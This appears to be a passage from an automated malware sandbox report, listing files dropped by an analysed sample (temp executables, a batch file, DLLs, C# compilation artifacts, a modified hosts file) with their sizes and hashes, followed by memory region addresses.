                      41876349cb12d6db992f1309f22df3f0

                      SHA1

                      5cf26b3420fc0302cd0a71e8d029739b8765be27

                      SHA256

                      e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                      SHA512

                      e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c172d6e8f5ea8b8f824a6a7316.exe
                      Filesize

                      45KB

                      MD5

                      27ca5b53a280c1a51ddd5747c75ffa2d

                      SHA1

                      c048e5b059251149b79cd17d97229fed8757a0c5

                      SHA256

                      368b07f18cb7707d2be3af8ee87833d9192703fe6f02b7dcafccaca5d77125b9

                      SHA512

                      ddee5299ffaf9be41d024a1bc87bc09a87b58d8e1f4d7b6573b24fc9fdf1356db486d81c1038e98eb5a0ebf98c4f00db8c4337087c7bd5c8a742992e962e893b

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
                      Filesize

                      9.5MB

                      MD5

                      0889dc6a9d5342610e999004e88930e2

                      SHA1

                      48e3b0dbe575ae5d91698d0ad367b5d3cabddbe6

                      SHA256

                      40b8e8d3e54d7def940ff428a7d464aff3ecdb57bcb7053cc460d72c4290d091

                      SHA512

                      1031051593dd2624242b1b1bd581bb38b379a5b64a30cf067b0595f09be822a51c0d3001f48f93ece6675a6f95679317f637fc04fedd367071dbde3ad4f85607

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\libcurl.dll
                      Filesize

                      522KB

                      MD5

                      e31f5136d91bad0fcbce053aac798a30

                      SHA1

                      ee785d2546aec4803bcae08cdebfd5d168c42337

                      SHA256

                      ee94e2201870536522047e6d7fe7b903a63cd2e13e20c8fffc86d0e95361e671

                      SHA512

                      a1543eb1d10d25efb44f9eaa0673c82bfac5173055d04c0f3be4792984635a7c774df57a8e289f840627754a4e595b855d299070d469e0f1e637c3f35274abe6

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat
                      Filesize

                      258B

                      MD5

                      d4900811b1e998ec72cc036816cbf334

                      SHA1

                      b6d37e7f23056167ab285fe56a47fe2377f6c606

                      SHA256

                      b5ee97397c792e8bdf904bc1da44212de1db1c192271d35f098df62abfffd070

                      SHA512

                      f518bf2f314973c5c4ed8c06062259354c2191c68fd02268299ce9f6f8d37bbda4810e995fdc7336fde29a8e3372b536f582a4098d322ce771eadd865d93cfee

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\zlib1.dll
                      Filesize

                      113KB

                      MD5

                      75365924730b0b2c1a6ee9028ef07685

                      SHA1

                      a10687c37deb2ce5422140b541a64ac15534250f

                      SHA256

                      945e7f5d09938b7769a4e68f4ef01406e5af9f40db952cba05ddb3431dd1911b

                      SHA512

                      c1e31c18903e657203ae847c9af601b1eb38efa95cb5fa7c1b75f84a2cba9023d08f1315c9bb2d59b53256dfdb3bac89930252138475491b21749471adc129a1

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pkzd5yd.2k0.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.dll
                      Filesize

                      4KB

                      MD5

                      d3de01f00290c7e93b49b3686294eec2

                      SHA1

                      318c714429501a59fcb6150168c119322446e606

                      SHA256

                      7b67856b496f45a7004c9c0b09b991964ff7564d63762c5d5ee7c2214d4bdf49

                      SHA512

                      63b43fbdb83ade2f734e5bbd4317a33935afab1c9954f6e1b0b0e3b291a7ef63c5a281e67c74ddb3c60bbd087995398bf6c5335dd694e51e767d95dc31aad8f3

                    • C:\Users\Admin\AppData\Local\Temp\tmp4C4B.tmp
                      Filesize

                      1KB

                      MD5

                      be5cfbcb0c2a9e354af2ac5a11ebe197

                      SHA1

                      c7efb0669961499a48dde818f962f21619958940

                      SHA256

                      fca5d075c55f7cc74325278940cf00f63a5291f6879875ee8e9ec4168de315d0

                      SHA512

                      00d6fd176600a242551dc5b90f0ad89edfaf3f103c640090d34ce3e7ee9c962bf30754bb3f38b58bd2e37ee2589f898785aa46f951802f019d5be9a460c553e3

                    • C:\Users\Admin\AppData\Local\Temp\zucewtWPJN\Display (1).png
                      Filesize

                      402KB

                      MD5

                      f4bda1d8067a6df8a53a339d8a6d1570

                      SHA1

                      83d6737732bc53fee0fff4ea2c7b02ade4068b59

                      SHA256

                      7ff2ccf9a795df63ddb4e86617771772a491aa1071d2cf616b19b641c750ba9f

                      SHA512

                      327ee0e492b89da3ab82604e3e88bd56f4cf04f8dbfca3a9c6c1408ceaa7effe02b03f388b8f1d1ed9c7ba8fa4ad8825262aa75e594e97e26d623d3eb0b59085

                    • C:\Windows\System32\drivers\etc\hosts
                      Filesize

                      2KB

                      MD5

                      6e2386469072b80f18d5722d07afdc0b

                      SHA1

                      032d13e364833d7276fcab8a5b2759e79182880f

                      SHA256

                      ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                      SHA512

                      e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                    • \??\c:\Users\Admin\AppData\Local\Temp\gntaur1q\CSCEBC7FD232D7C478BAE43FE8039FC7AA5.TMP
                      Filesize

                      652B

                      MD5

                      09845858f5729994267952e90ac18d56

                      SHA1

                      675d51aaebc6a653a913216eb8c66f1ad50f4149

                      SHA256

                      df2334f4eb7d27615513b1cc7acc3d2a19879274162c7eb58b09c2f56f62ee80

                      SHA512

                      6273384ff3f551194520cfff4fe02934deb1f64f6d67c9af3e1791adc2c3b1f176c3956479f1da2706a39aad496cf78e0b3d66c6e6279258dcb60c0bf9ae18c9

                    • \??\c:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.0.cs
                      Filesize

                      1004B

                      MD5

                      c76055a0388b713a1eabe16130684dc3

                      SHA1

                      ee11e84cf41d8a43340f7102e17660072906c402

                      SHA256

                      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                      SHA512

                      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                    • \??\c:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.cmdline
                      Filesize

                      607B

                      MD5

                      878764946fae9a156cacc5252c95916d

                      SHA1

                      6b73e2cbf26cd08bd21c7f7e983ff65843d95d6d

                      SHA256

                      9f94f64750a021463d29d2b7ada5ffba19f21cd68c1aa70670160fc94aaf5787

                      SHA512

                      d1576c025c65e4ae34ab40b589a4fb6dc40d6c7c9c490cec1eabee64db20fd425e29946b47894d52bb178bc654b2895d38917a47cb324f0364d83d484c72049c

                    • memory/688-1728-0x0000019DB1B90000-0x0000019DB1BB2000-memory.dmp
                      Filesize

                      136KB

                    • memory/2068-1688-0x00007FFADB083000-0x00007FFADB085000-memory.dmp
                      Filesize

                      8KB

                    • memory/2068-1809-0x0000000180000000-0x0000000180C32000-memory.dmp
                      Filesize

                      12.2MB

                    • memory/2068-1814-0x00007FFAD5BE0000-0x00007FFAD5C04000-memory.dmp
                      Filesize

                      144KB

                    • memory/2068-1717-0x0000016065D20000-0x0000016065D2E000-memory.dmp
                      Filesize

                      56KB

                    • memory/2068-1713-0x000001607FF10000-0x000001607FFCA000-memory.dmp
                      Filesize

                      744KB

                    • memory/2068-1698-0x0000016080450000-0x000001608098C000-memory.dmp
                      Filesize

                      5.2MB

                    • memory/2068-1813-0x0000000180000000-0x0000000180C32000-memory.dmp
                      Filesize

                      12.2MB

                    • memory/2068-1811-0x00007FFADB083000-0x00007FFADB085000-memory.dmp
                      Filesize

                      8KB

                    • memory/2068-1793-0x0000000180000000-0x0000000180C32000-memory.dmp
                      Filesize

                      12.2MB

                    • memory/2068-1715-0x000001607FDE0000-0x000001607FE5E000-memory.dmp
                      Filesize

                      504KB

                    • memory/2068-1796-0x0000000180000000-0x0000000180C32000-memory.dmp
                      Filesize

                      12.2MB

                    • memory/2068-1797-0x0000000180000000-0x0000000180C32000-memory.dmp
                      Filesize

                      12.2MB

                    • memory/2068-1798-0x0000000180000000-0x0000000180C32000-memory.dmp
                      Filesize

                      12.2MB

                    • memory/2068-1690-0x0000016065960000-0x000001606597A000-memory.dmp
                      Filesize

                      104KB

                    • memory/2068-1801-0x0000016065D30000-0x0000016065D38000-memory.dmp
                      Filesize

                      32KB

                    • memory/2068-1802-0x0000016065D90000-0x0000016065DC8000-memory.dmp
                      Filesize

                      224KB

                    • memory/2068-1803-0x0000016065D50000-0x0000016065D5E000-memory.dmp
                      Filesize

                      56KB

                    • memory/2068-1805-0x00007FFAD5BE0000-0x00007FFAD5C04000-memory.dmp
                      Filesize

                      144KB

                    • memory/2068-1804-0x0000000180000000-0x0000000180C32000-memory.dmp
                      Filesize

                      12.2MB

                    • memory/2096-1806-0x00000000050C0000-0x00000000050CA000-memory.dmp
                      Filesize

                      40KB

                    • memory/2096-1807-0x0000000005B00000-0x0000000005B92000-memory.dmp
                      Filesize

                      584KB

                    • memory/2096-1808-0x0000000006150000-0x00000000066F4000-memory.dmp
                      Filesize

                      5.6MB

                    • memory/2096-1795-0x00000000056B0000-0x0000000005716000-memory.dmp
                      Filesize

                      408KB

                    • memory/2760-1691-0x000000007536E000-0x000000007536F000-memory.dmp
                      Filesize

                      4KB

                    • memory/2760-1694-0x0000000000BF0000-0x0000000000C02000-memory.dmp
                      Filesize

                      72KB

                    • memory/4820-1779-0x00000272475C0000-0x00000272475C8000-memory.dmp
                      Filesize

                      32KB